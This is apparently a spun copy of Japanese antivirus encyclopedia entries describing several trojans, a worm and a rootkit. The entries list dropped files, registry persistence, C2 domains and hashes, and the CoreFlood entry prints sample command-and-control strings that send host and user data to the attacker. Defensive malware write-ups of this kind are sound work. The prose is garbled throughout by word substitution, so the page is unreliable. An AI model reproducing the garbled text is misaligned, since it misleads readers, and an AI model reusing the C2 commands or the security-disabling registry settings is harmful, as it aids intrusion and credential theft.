スパイウェア 駆除,パソコン ウイルス,ウイルス 無料

Freg対策,
ウイルス情報ウイルス情報

ウイルス名Freg
類別トロイの木馬ファイルサイズ低最小定義ファイル
(初っ端に検出を確認したパブジョン)4172対応定義ファイル
(現在不可欠とされるパブジョン)4264　01/11/14

駆逐補足ウイルス駆逐のヒント
アウトラインウイルスのめりはり感染症状感染手立て駆逐手立て

ウイルスのめりはり

このトロイの木馬は、Browser Helper Object DLL（Microsoft Visual C++で書かれた)として存在します。それは、Internet Explorerに繋がっていて、ウェブサイトのリンクの検索や、お気に入りフォルダにURLショートカットを作成したりします。ActiveXによってインストールされるものと推測されます。

以下の症状が見られる時、このウイルスに感染している割合があります。

身も知らぬURLショートカットがお気に入りフォルダに存在する。

感染手立て

駆逐手立て

,Freg対策

CoreFlood.dr!C2D4DB2D対策,

ウイルス情報ウイルス名リスク度CoreFlood.dr!C2D4DB2D企業ユーザ: N/A
個人ユーザ: N/A類別トロイの木馬最小定義ファイル
(初っ端に検出を確認したパブジョン)5720対応定義ファイル
(現在不可欠とされるパブジョン)5722　2009/08/25

駆逐補足ウイルス駆逐のヒント
アウトラインウイルスのめりはり感染症状感染手立て駆逐手立て

CoreFlood.dr!C2D4DB2Dはトロイの木馬です。ウイルスと異なり、トロイの木馬は自己複製しません。多くの時、ファイルがメリットである、あるいはファイルを欲しいと思発言させて手動で実行させることにより繁殖します。最も一般的なインストール手立ては、システムやセキュリティを悪用し、疑いを持たないユーザに手動で未知の本職グラムを実行させることです。電坊主メール、悪質な、またはハッキングされているWebサイト、IRC、ピアツーピアネットワークなどを便秘気味て配布されます。

ウイルスのめりはり

実行時、CoreFlood.dr!C2D4DB2DはsystemsフォルダにCoreFlood.dllという名前で検出されるランダムな名前のocxファイルをドロップします。

%system%\%random%.ocx

また、ランダムな名前で以下のデータファイルもドロップします。

%system%\dimazylg.dat

%system%\ieakscev.dat

%system%\rcbdyctl.dat

%system%\vwipyspx.dat

%system%\w3ssN.dat

起動時に自動的に反応するため、ドロップしたOCXファイルはランダムなCLSIDを有するShellIconOverlayIdentifierとして登録されます。以下のレジストリキーと値が作成されます。

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ランダムなCLSID}\InprocServer32\: “malware path”

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ランダムなCLSID}\InprocServer32\ThreadingModel: “Apartment”

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ランダムなCLSID}\: “random”

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\wmvdmydf\: “{ランダムなCLSID}”

作成後、explorer.exeに挿入されます。さらに、以下にも挿入される割合があります。

iexplore

firefox

opera

skype

さらに、HTTP POSTリクエストをコマンド＆コントロールサーバに発信して、情報を発信し、コマンドを受信する割合があります。CoreFlood.dr!C2D4DB2DはTCPポート80でsoftwarevalidate.comに接続することが確認されています。

コマンド＆コントロールサーバから発信されたコマンドの例は以下のとおりです。

del ID; addto ID 23957327; setstr ID +S

http #hosts +b “http #hosts +up /index.php usr=\\E\\u\\E%26wg=\\E\\vUSERDOMAIN=\\E%26cn=\\E\\H\\E%26i=23957327%26v=3177%26os=\\E\\O\\E%26s=\\E\\p\\E%26h=\\E\\h\\E%26d=\\d%26b=\\b%26u=\\Z%26k=\\K%26m=\\M%26panic=\\qpanic$%26ie=\\qie$%26input=\\qinput$%26other=\\qother$%26c=\\c%26l=\\l”

setwnd 15 https://* * * +K

setwnd 17 https://* * * +K

setwnd 18 * https://* * +K

setwnd 19 * * * +K

setwnd 11 *caja*.es* * * +QHurfPMSW 4096 4 300000

http #hosts +I 480000

また、以下のコマンドが攻撃者から発信される割合があります。

ADD

ADDTO

COPY

DEL

DELCOOKIES

DELFROM

DISKFLOOD

DISKUNFLOOD

DONOP

ECHO

EXIT

EXPORT

FIND

INFO

INS

JB

LISTCOOKIES

LOG

LST

LSTWND

MOVE

MULTICAST

OPEN

PERFRM

RESOLVE

RESPAWN

RESTART

RMOLD

RSV

RUN

RUNDLL

SET

SETCOOKIE

SETRANGE

SETSP

SETSTR

SETWND

SHUTDOWN

SPACE

STATS

TIME

UNFREEZE

UNIFORG

UNINSTALL

URL

WND

その他の悪質な活動の一例は以下のとおりです。

ユーザ名と合格ワードの泥棒出し

さら入るマルウェアのダウンロードとインストール

システムの改変

フラッド攻撃

CoreFlood.dr!C2D4DB2Dは通常、ブラウザの脆弱性を利用して広がることが確認されています。また、他のマルウェアによってダウンロードされ、psexec.exeを無くなって他のマシンにインストールされる時があることも確認されています。

以下の症状が見られる時、このウイルスに感染している割合があります。

ターゲットマシン上に新しいファイルがドロップされています。

上記のネットワーク活動が見られます。

感染手立て

CoreFlood.dr!C2D4DB2Dはマルチドロッパ型トロイの木馬で、ターゲットシステムに他のファイルをドロップして実行します。自己複製は行いません。一般的には、IRC、ピアツーピアファイル共有ネットワーク、ニュースグループへの投稿や電坊主メールの添付ファイルなどを便秘気味て配布されます。

駆逐手立て■現行のエンジンとウイルス定義ファイルを使用して、検出駆逐して下さい。

システムスタートアップをフックするためのシステムレジストリ、INIファイルの修正は、推奨エンジン/ウイルス定義ファイル以上を使用した時は正常に駆逐されます。

Windows ME/XPでの駆逐についての補足

,CoreFlood.dr!C2D4DB2D対策

CoreFlood.dr対策,

ウイルス情報ウイルス名リスク度CoreFlood.dr企業ユーザ: 低[要用心]
個人ユーザ: 低[要用心]類別トロイの木馬最小定義ファイル
(初っ端に検出を確認したパブジョン)4292対応定義ファイル
(現在不可欠とされるパブジョン)5788　2004/11/24

駆逐補足ウイルス駆逐のヒント
アウトラインウイルスのめりはり感染症状感染手立て駆逐手立て

– 2009年10月30昼間の時間書き換え –

ドロップするファイルの命名規則が若干異入る新しい亜類が確認されています。従来は[ランダムなDLL名].dIlでしたが、現在は[ランダムなDLL名].ocxになっています。

悪質なコードが以下の過程に挿入されます。

explorer.exe

iexplore.exe

firefox.exe

opera.exe

skype.exe

TCPポート80を無くなって以下を含むドメイン名に接続する亜類が確認されています。

[削除].nhs.net/[削除]

[削除].nhs.uk/[削除]

[削除].hilton.[削除]

[削除].yahoo.[削除]

[削除].google.[削除]

– 2008年7月2昼間の時間書き換え —

以下のWebサイトで注目されたため、リスク度を[低]に変更しました。

http://www.pcworld.idg.com.au/index.php/id;990723355;fp;2;fpid;1

–

CoreFlood.drはトロイの木馬です。ウイルスと異なり、トロイの木馬は自己複製しません。多くの時、ファイルに益がある、あるいは欲しいと思発言させて手動で実行させることにより繁殖します。最も一般的なインストール手立ては、システムやセキュリティを悪用し、疑いを持たないユーザに手動で未知の本職グラムを実行させることです。電坊主メール、悪質な／ハッキングされたWebサイト、IRC、ピアツーピアネットワークなどを便秘気味て配布されます。

ウイルスのめりはり

– 2008年11月6昼間の時間書き換え –

ポート80を無くなって以下に接続する亜類が確認されています。

avupdate.net

mcupdate.net

他のマルウェアのダウンロードと実行、情報の記録と泥棒出し、自身のアップデート、フラッド攻撃などのコマンドを受信できます。

CoreFlood.drは通常、ブラウザの脆弱性を利用して広がることが確認されています。また、他のマルウェアによってダウンロードされ、psexec.exeを無くなって他のマシンにインストールされる時があることも確認されています。

– 2008年6月24昼間の時間書き換え —

以下は一般的な合格の編集の既定値です。

%SystemDir% = \WINDOWS\SYSTEM (Windows 98/ME), \WINDOWS\SYSTEM32 (Windows XP/Vista), \WINNT\SYSTEM32 (Windows NT/2000)

「wmedia106.exe」という名前でCorefloodの新しいパブジョンが発見されました。実行時、explorer.exeにフックするDLLファイルを%SystemDir%にドロップします。

ドロップされたDLLの名前はインストールごとに異なります。以下の説明では、DLLのランダムな名前を「[ランダムなDLL名]」とします。

以下のファイルがシステムに追加されます。

%SystemDir%\[ランダムなDLL名].dat

%SystemDir%\[ランダムなDLL名].dIl

%SystemDir%\[ランダムな名前].dat

%SystemDir%\[ランダムな名前].dat

%SystemDir%\[ランダムな名前].dat

%SystemDir%\[ランダムな名前].dat

以下のレジストリ要素が作成されます。

HKEY_LOCAL_MACHINE\software\classes\clsid\{[ランダムなCLSID]}\InprocServer32

　　(既定) = %SystemDir%\[ランダムなDLL名].dIl

HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\ shelliconoverlayidentifiers\[ランダムなDLL名]\

　　(既定) = {[ランダムなCLSID]}

– 2004年12月28昼間の時間書き換え —

CoreFlood.drはHTAファイルを介してダウンロードを行います。近頃公表されたMicrosoft Internet ExplorerのHTMLヘルプコントロールのローカルゾーンのセキュリティ制限を回避する脆弱性と合発言させて使用されていると思われます。

CoreFlood.drはCorefloodをドロップするドロッパファイルです。

ドロッパファイルの目的はターゲットマシンに他のファイルをドロップして実行することだけです。実行されると、目的を果たします。ドロッパ自体は是非ともしもターゲットマシンにインストールされません。

以下の症状が見られる時、このウイルスに感染している割合があります。

ターゲットマシン上に新しいファイルがドロップされています。

上記のネットワーク活動が見られます。

感染手立て

CoreFlood.drはマルチドロッパ型トロイの木馬で、ターゲットシステムに他のファイルをドロップして実行します。自己複製は行いません。一般的には、IRC、ピアツーピアファイル共有ネットワーク、ニュースグループへの投稿や電坊主メールの添付ファイルなどを便秘気味て配布されます。ターゲットがファイルを実行するよう仕向けたファイル名が使われる割合が高いです。

また、セキュリティが不十分なため、トロイの木馬を受信することもあります。

駆逐手立て■現行のエンジンとウイルス定義ファイルを使用して、検出駆逐して下さい。

システムスタートアップをフックするためのシステムレジストリ、INIファイルの修正は、推奨エンジン/ウイルス定義ファイル以上を使用した時は正常に駆逐されます。

Windows ME/XPでの駆逐についての補足

,CoreFlood.dr対策

FakeAlert-GA.gen対策,

ウイルス情報ウイルス名リスク度FakeAlert-GA.gen企業ユーザ: 低
個人ユーザ: 低類別トロイの木馬最小定義ファイル
(初っ端に検出を確認したパブジョン)5889対応定義ファイル
(現在不可欠とされるパブジョン)5892　2010/02/11

駆逐補足ウイルス駆逐のヒント
アウトラインウイルスのめりはり感染症状感染手立て駆逐手立て

他の亜類と同様、「FakeAlert-GA.gen」はマシンが感染またはリスクにさらされているとユーザに警告する偽の警告メッセージを表示します。偽のメッセージの意図は、ユーザに宣伝しているスパイウェア対策製気品を購入させることです。

ファイル本職パティ

MD5: D61EA6F884718844A333A3ADA2E5AC19

SHA1: 12714F974F96754B0C81E86D332D5ABDC64F815E

ファイルサイズ: 1,057,800バイト

ウイルスのめりはり

実行時、以下のファイルをドロップします。

%ProgramFiles%\adc32.dll [トロイの木馬として検出]

%ProgramFiles%\alggui.exe [Trojan.Dropper.Aとして検出]

%ProgramFiles%\svchost.exe [トロイの木馬として検出]

%ProgramFiles% \Your PC Protector\Your PC Protector.exe [トロイの木馬として検出]

ユーザのシステムが乗っ取られると、偽のスパイウェア対策ソフトウェアを表示し、システムが感染していると警告し、乗っ取ったユーザに偽のスパイウェア対策ソフトウェアを購入させようとします。

以下のフォルダがシステムに追加されます。

%UserProfile%\Start Menu\Programs\Your PC Protector

%ProgramFiles%\Your PC Protector

以下のレジストリキーがシステムに追加されます。

[HKEY_USERS\S-1-(不定)\Software\Your PC Protector]

[HKEY_USERS\S-1-(不定)\Software\Your PC Protector\Your PC Protector]

[HKEY_USERS\S-1-(不定)\Software\Your PC Protector\Your PC Protector\Registration]

[HKEY_USERS\S-1-(不定)\Software\Your PC Protector\Your PC Protector\setdata]

以下のレジストリ値がシステムに追加されます。

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77DC0Baa-3235-4ba9-8BE8-aa9EB678FA02}\InprocServer32\]

Default=”%ProgramFiles%\adc32.dll

上記のレジストリにより、Windowsが起動するたびにFakeAlert-GA.genが実行されるようにします。

「svchost.exe」ファイルがサービスとしてターゲットマシンにインストールされます。本職パティは以下のとおりです。

[HKEY_LOCAL_MACHINE\SYSTEM\\SYSTEM\ControlSet001\Services\AdbUpd\

"ImagePath"= "%ProgramFiles%\svchost.exe"

"DisplayName"= "Adobe Update Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AdbUpd\]

“ImagePath”= “%ProgramFiles%\svchost.exe”

“DisplayName”=”Adobe Update Service

このサービスはシステム起動時に自動的に起動するようインストールされます。

また、リモートポート80を無くなって「core28[削除]ation.com」に接続します。

以下の症状が見られる時、このウイルスに感染している割合があります。

上記のファイルおよびレジストリが存在します。

上記のサイトへの予期しないネットワーク接続が存在します。

大切な実行ファイルの実行を防ぎ、感染したと表示します。

感染手立て

FakeAlert-GA.genは悪質なWebページにアクセスするとインストールされます。また、他のウイルスやトロイの木馬によってダウンロードされ、インストールされる割合もあります。

さらに、インターネットからダウンロードしたバンドルソフトと一緒にインストールされる割合があります。

駆逐手立て

現行のエンジンとウイルス定義ファイルを使用して、検出駆逐して下さい。

システムスタートアップをフックするためのシステムレジストリ、INIファイルの修正は、推奨エンジン/ウイルス定義ファイル以上を使用した時は正常に駆逐されます。

Windows ME/XPでの駆逐についての補足

,FakeAlert-GA.gen対策

FakeAlert-MA対策,

ウイルス情報ウイルス名リスク度FakeAlert-MA企業ユーザ: 低
個人ユーザ: 低類別トロイの木馬最小定義ファイル
(初っ端に検出を確認したパブジョン)5890対応定義ファイル
(現在不可欠とされるパブジョン)5894　2010/02/12

駆逐補足ウイルス駆逐のヒント
アウトラインウイルスのめりはり感染症状感染手立て駆逐手立て

FakeAlert-MAは偽の警告を行うトロイの木馬です。名前の通り、乗っ取ったユーザのシステムに偽の警告を表示します。実際にはそうではありませんが、ユーザのシステムが多大な悪影響を浴びているように装います。その後、偽のバルーンヒントを表示し、乗っ取られたユーザがクリックすると、偽のウイルス対策ソフトウェアを買うよう促します。

FakeAlert-MAはすっかり自動でインストールされ、システムでウイルススキャンを実行します。ウイルスを検出したと偽り、システムからウイルスを駆逐するため、製気品を登録するよう注文します。

ウイルスのめりはり

実行時、FakeAlert-MAは以下のレジストリキーを作成します。

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\buy-security-essentials.com

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\download-soft-package.com

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\download-software-package.com

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\download-software-package.com

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\is-software-download.com

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

HKEY_CURRENT_USER\Software\SE2010

以下のレジストリ値がシステムに追加されます。

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter]

“Enabled” = 00, 00, 00, 00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]

“EnableAutoTray” = 00, 00, 00, 00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

“NoActiveDesktopChanges” = 01, 00, 00, 00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

“NoSetActiveDesktop” = 01, 00, 00, 00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

“DisableTaskMgr” = 01, 00, 00, 00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

“Security essentials 2010″ = C:\Program Files\Securityessentials2010\SE2010.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ActiveDesktop]

“NoChangingWallpaper” = 01, 00, 00, 00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]

“NoActiveDesktopChanges” = 01, 00, 00, 00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]

“NoSetActiveDesktop” = 01, 00, 00, 00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]

“EnableLUA” = 00, 00, 00, 00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

“smss32.exe” = C:\WINDOWS\system32\smss32.exe

以下のレジストリ値が改変されます。

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General "Wallpaper"]

%SystemRoot%\system32\warnings.html

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Userinit"]

C:\WINDOWS\system32\winlogon32.exe

以下のファイルがFakeAlertによってドロップ／作成されます。

c:\Documents and Settings\%User%\Application Data\Microsoft\Internet Explorer\Quick Launch\Security essentials 2010.lnk (788バイト)

c:\Documents and Settings\%User%\Desktop\Security essentials 2010.lnk (788バイト)

c:\Documents and Settings\%User%\Start Menu\Security essentials 2010.lnk (770バイト)

c:\Program Files\Securityessentials2010\SE2010.exe (1,496,576バイト)

c:\%WinDir%\%SystemDir%\41.exe (0バイト)

c:\%WinDir%\%SystemDir%\helpers32.dll (24,576バイト)

c:\%WinDir%\%SystemDir%\smss32.exe (43,520バイト)

c:\%WinDir%\%SystemDir%\warnings.html (4,278バイト)

c:\%WinDir%\%SystemDir%\winlogon32.exe (43,520バイト)

バックが変更され、以下のようなメッセージが表示されます。アイコンのバックの色が赤に変更されます。

ユーザが「OK」ボタンをクリックすると、メイン本職グラムがロードされ、偽のハードディスク割り知ってブのスキャンが開始されます。

FakeAlertを閉じることはできますが、以下のようなポップアップメッセージや書き換えメッセージがタスクパブに表示され継続します。

乗っ取られたユーザがアプリケーションを開こうとすると、ファイルが感染していて実行できないため、FakeAlertを買うよう提起する警告メッセージ／バルーンヒントが表示されます。

以下のドメインにアクセスする割合があります。

For-su[削除]-se.com

88.80.[削除]9

Winter-sm[削除].com

以下の症状が見られる時、このウイルスに感染している割合があります。

システムがひどく感染しているかのような偽の警告を表示します。

レジストリを改変します。

ユーザをだまし、偽のウイルス対策ソフトウェアの購入を促します。

感染手立て

トロイの木馬は自己複製しません。多くの時、その実行可能ファイルに何らかの利益があると思発言させて手動で実行させることにより繁殖します。IRC、ピアツーピアネットワーク、ニュースグループへの投稿、スパムメールなどを便秘気味て配布されます。

駆逐手立て

現行のエンジンとウイルス定義ファイルを使用して、検出駆逐して下さい。

システムスタートアップをフックするためのシステムレジストリ、INIファイルの修正は、推奨エンジン/ウイルス定義ファイル以上を使用した時は正常に駆逐されます。

Windows ME/XPでの駆逐についての補足

,FakeAlert-MA対策

Generic PWS.y!bzc対策,

ウイルス情報ウイルス名リスク度Generic PWS.y!bzc企業ユーザ: 低
個人ユーザ: 低類別トロイの木馬最小定義ファイル
(初っ端に検出を確認したパブジョン)5896対応定義ファイル
(現在不可欠とされるパブジョン)5899　2010/02/18

駆逐補足ウイルス駆逐のヒント
アウトラインウイルスのめりはり感染症状感染手立て駆逐手立て

Generic PWS.y!bzcはトロイの木馬です。ウイルスと異なり、トロイの木馬は自己複製しません。多くの時、ファイルがメリットである、あるいはファイルを欲しいと思発言させて手動で実行させることにより繁殖します。最も一般的なインストール手立ては、システムやセキュリティを悪用し、疑いを持たないユーザに手動で未知の本職グラムを実行させることです。電坊主メール、悪質な、またはハッキングされているWebサイト、IRC、ピアツーピアネットワークなどを便秘気味て配布されます。

ファイル情報

MD5 - BD233CCB573FE45EFD383B2923DC24EC

SHA - A7B5331670BC822362B2FA2EF133BF3BB9CCE96A

ウイルスのめりはり

Generic PWS.y!bzcは合格ワードを泥棒出すトロイの木馬で、ユーザのオンラインバンキングの資格情報を泥棒出そうとします。

実行時、以下のファイルをドロップします。

% WinDir%\system32\sdra64.exe

% WinDir %\system32\lowsec\local.ds

% WinDir %\system32\lowsec\user.ds

以下のレジストリ値が改変されます。

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\]

“Userinit:” = “%WinDir%\system32\userinit.exe,%WinDir%\System32\sdra64.exe,”

上記のレジストリ項目により、Windowsが起動されるたびにGeneric PWS.y!bzcが実行されるようにします。

ユーザのシステムが乗っ取られた後にユーザが下記のリンクにアクセスすると、ログインに不可欠な資格情報を泥棒出します。

https://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome

以下の過程にコードを挿入します。

Winlogon.exe

Svchost.exe

Explorer.exe

以下のセキュリティソフトウェアが見つかると、修了します。

Outpost.exe (Outpost Personal Firewallアプリケーション)

Zclient.exe (ZoneLabs Firewall Client)

インターネットからダウンロード可能な、構成ファイルで提供されているbotコマンドを介して以下の反応を行うことができます。

botの名前の変更

実証書の入手

botによるsolファイルの入手

solファイルの消去

ホームページの設定

URLのブロック

URLのブロックの解除

また、以下のいずれかのmutexオブジェクトを作成します。

AVIRA_2110

AVIRA_2101

AVIRA_2108

AVIRA_2109

AVIRA_21099

注：[%Windir%はWindowsフォルダ。例：c:\windows]

以下の症状が見られる時、このウイルスに感染している割合があります。

上記のファイルおよびレジストリキーが存在します。

上記のmutexが存在します。

感染手立て

トロイの木馬は自己複製しません。多くの時、その実行可能ファイルに何らかの利益があると思発言させて手動で実行させることにより繁殖します。IRC、ピアツーピアネットワーク、ニュースグループへの投稿、スパムメールなどを便秘気味て配布されます。

駆逐手立て

現行のエンジンとウイルス定義ファイルを使用して、検出駆逐して下さい。

システムスタートアップをフックするためのシステムレジストリ、INIファイルの修正は、推奨エンジン/ウイルス定義ファイル以上を使用した時は正常に駆逐されます。

Windows ME/XPでの駆逐についての補足

,Generic PWS.y!bzc対策

W32/Hamweq.worm.a対策,

ウイルス情報ウイルス名リスク度W32/Hamweq.worm.a企業ユーザ: 低
個人ユーザ: 低類別ウイルス最小定義ファイル
(初っ端に検出を確認したパブジョン)5890対応定義ファイル
(現在不可欠とされるパブジョン)5895　2010/02/12

駆逐補足ウイルス駆逐のヒント
アウトラインウイルスのめりはり感染症状感染手立て駆逐手立て

W32/Hamweq.worm.aはウイルスです。ウイルスは繰り返し自己複製する本職グラムで、感染システムがウイルスを他のシステムに拡散して、ウイルスをさらに繁殖させます。多くのウイルスには破壊的なペイロードが組み込まれていますが、通常はシステムからシステムに広がる以世間には何も行いません。

ファイル情報

MD5 - DE7167549F640D2AB96D75EE002A9136

SHA - 2A7893F36210F1B2776EB1BB0E59D2FE36AA2D42

ファイルサイズ - 17949バイト

ウイルスのめりはり

実行時、以下の敷地に自身をコピーします。

C:\ReCYCLER\S-1-(不定)\spoolsv.exe (隠しファイル)

また、以下のファイルをドロップします。

C:\ReCYCLER\S-1-(不定)\Desktop.ini (隠しファイル)

以下のレジストリ値がシステムに追加されます。

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{88ABC5C0-4FCB-11BB-AAX5-81CX1C635612}\]

“StubPath:” = “c:\ReCYCLER\S-1(不定)\spoolsv.exe”

ユーザのシステムを乗っ取った後、リムーバブル割り知ってブを探します。リムーバブル割り知ってブ割り知ってブが見つかると、以下の敷地にコピーを拡散します。

[Removable Drive]:\ ReCYCLER\ S-1-(不定)\Spoolsv.exe (隠しファイル)

また、リムーバブル割り知ってブに「autorun.inf」という名前の隠しファイルを作成して、ユーザが感染したリムーバブル割り知ってブを別のコンピュータに挿入したときに自動的に実行されるようにします。

実行時、explorer.exeにコードを挿入し、主にIRCトラフィックに使われるリモートポート6667を介して124.217.[削除].112に接続します。背景ドア活動を実行して、リモートサーバから悪質なファイルをダウンロード／実行し、フラッド攻撃を仕掛けます。

以下の症状が見られる時、このウイルスに感染している割合があります。

上記のファイルおよびレジストリキーが存在します。

上記のIPアドレスへの予期しないネットワーク接続が存在します。

感染手立て

ウイルスは自己複製します。多くの時、ネットワーク、またはリムーバブルディスク、書き込み可能なCD、USB割り知ってブなどのリムーバブルメディアへの発信によって拡散されます。また、ネットワークファイルシステム、他のコンピュータと共有されているファイルシステムのファイルに感染して、広がる割合があります。

駆逐手立て

現行のエンジンとウイルス定義ファイルを使用して、検出駆逐して下さい。

システムスタートアップをフックするためのシステムレジストリ、INIファイルの修正は、推奨エンジン/ウイルス定義ファイル以上を使用した時は正常に駆逐されます。

Windows ME/XPでの駆逐についての補足

,W32/Hamweq.worm.a対策

Generic Rootkit.ej対策,

ウイルス情報ウイルス名リスク度Generic Rootkit.ej企業ユーザ: N/A
個人ユーザ: N/A類別トロイの木馬最小定義ファイル
(初っ端に検出を確認したパブジョン)5902対応定義ファイル
(現在不可欠とされるパブジョン)5902　2010/02/23

駆逐補足ウイルス駆逐のヒント
アウトラインウイルスのめりはり感染症状感染手立て駆逐手立て

ルートキットとは、ファイル、過程、レジストリキー、ネットワーク接続を隠す、どのマルウェアとも併用可能な本職グラムです。Generic Rootkit.ejはこのようなマルウェアのひとつです。

Generic Rootkit.ejはIRP_MJ_CREATE of NTFS.sysにフックします。

ウイルスのめりはり

実行時、感染したマシンの復活動時にWindowsサービスとして実行されるよう、以下のレジストリ項目を作成します。

HKEY_Local_Machine\System\CurrentControlSet\Services\pxmauuve

ImagePath = <ファイルへの合格>

DisplayName = “pxmauuve”

以下のメールサーバのDNSクエリを行います。

MX aol.com

MX slashdot.org

MX mozilla.org

MX google.com

以下のIPに接続します。

74.86.210.133

96.9.183.149

以下の症状が見られる時、このウイルスに感染している割合があります。

上記のレジストリ項目が存在します。

感染手立て

トロイの木馬は自己複製しません。多くの時、その実行可能ファイルに何らかの利益があると思発言させて手動で実行させることにより繁殖します。トロイの木馬が着く元でには、セキュリティ対策が不十分、マシンに修正本職グラムが適用されていない、システムが脆弱といった事情が考えられます。

IRC、ピアツーピアネットワーク、電坊主メール、ニュースグループへの投稿などを便秘気味て配布されます。

駆逐手立て

現行のエンジンとウイルス定義ファイルを使用して、検出駆逐して下さい。

駆逐手立ては、WindowsおよびWindows\System foldersからファイルを手動で消去するために、SYSTEM.INI ファイルのエントリーを削除し、MS-DOSモードで復活動してくかっこ悪い。

,Generic Rootkit.ej対策